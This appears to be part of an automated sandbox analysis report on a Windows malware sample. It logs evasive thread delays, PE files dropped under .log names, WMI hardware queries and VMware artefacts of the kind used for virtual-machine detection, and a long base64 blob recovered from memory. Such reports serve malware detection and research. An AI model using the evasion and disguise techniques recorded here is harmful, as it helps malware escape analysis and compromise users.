                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597107Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597000Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596891Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596781Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596672Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596563Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596438Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596313Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596203Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596094Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595984Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595875Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595766Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595656Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595547Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595438Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595328Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595210Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595094Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594984Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594875Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594656Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594547Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWindow / User API: threadDelayed 1647Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWindow / User API: threadDelayed 8155Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeDropped PE file which has not been started: C:\Users\user\Desktop\UxpXqoOQ.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeDropped PE file which has not been started: C:\Users\user\Desktop\CUGzHwzy.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ffpwzeUX.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ddDNduPc.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\dVTvzLpX.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\oOILjGZF.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\EQOQCKPT.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeDropped PE file which has not been started: C:\Users\user\Desktop\vnZStDyM.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeDropped PE file which has not been started: C:\Users\user\Desktop\mKRcJKjf.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeDropped PE file which has not been started: C:\Users\user\Desktop\VDAxqXDQ.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe TID: 7488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7672Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -599891s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -599781s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -599672s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -599563s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -599438s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -599328s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -599219s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -599099s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7872Thread sleep time: -10800000s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598969s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598859s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598750s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598641s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598531s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598422s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598313s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598188s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -598078s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597969s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597859s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597739s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597610s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597485s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597360s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597235s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597107s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -597000s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -596891s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -596781s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -596672s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -596563s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -596438s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -596313s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -596203s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -596094s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595984s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595875s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595766s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595656s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595547s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595438s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595328s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595210s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595094s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594984s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594875s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594766s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594656s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594547s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00FBA69B
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00FCC220
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCE6A3 VirtualQuery,GetSystemInfo,0_2_00FCE6A3
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599891Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599781Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599672Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599563Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599438Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599219Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 599099Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598969Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598859Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598750Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598641Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598531Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598422Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598313Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598188Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 598078Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597969Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597859Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597739Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597610Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597485Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597360Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597235Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597107Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 597000Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596891Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596781Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596672Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596563Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596438Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596313Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596203Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 596094Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595984Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595875Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595766Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595656Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595547Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595438Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595328Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595210Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 595094Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594984Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594875Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594656Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 594547Jump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: ChainPortServerBrowsermonitor.exe, 00000004.00000002.1716950692.000000001BA3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4118258709.0000000012DC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: xTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: wscript.exe, 00000001.00000002.1686536575.0000000002917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
